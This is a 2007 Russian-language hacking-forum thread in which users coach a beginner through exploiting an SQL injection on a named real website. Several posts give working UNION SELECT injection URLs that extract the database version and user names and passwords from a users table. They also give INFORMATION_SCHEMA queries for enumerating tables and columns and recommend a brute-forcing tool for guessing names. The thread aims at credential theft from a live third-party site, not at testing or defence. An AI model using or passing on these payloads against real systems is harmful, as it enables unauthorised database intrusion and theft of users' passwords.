Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL-inj (https://forum.antichat.xyz/showthread.php?t=47071)

Qwertison 19.08.2007 16:15
SQL-inj
 
Вот SQL-inj
Код:
http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?

Basurman 19.08.2007 16:46
А там нет скули. Поищи другие скрипты

Qwertison 19.08.2007 16:48
Всмысле, ошибка же есть?

Ksander 19.08.2007 17:18
Там не смотрел, но вот тут она точно есть

Код:
хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
Цитата:
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(name,0x3a,password)+from+mai n_users/*

Qwertison 20.08.2007 13:33
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?

phol1eadeux 20.08.2007 13:46
Цитата:
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Можно вручную, либо специализированными программами-брутерами

Qwertison 20.08.2007 13:48
Какими например, я таких не видел.

phol1eadeux 20.08.2007 13:55
SQL Bruter - одна из них

Ksander 20.08.2007 14:02
Цитата:
Сообщение от Qwertison
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?

Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*

ENFIX 20.08.2007 14:24
Цитата:
Сообщение от Ksander
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION.SCHEMA_TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION.SCHEMA_COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS


Время: 13:35
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице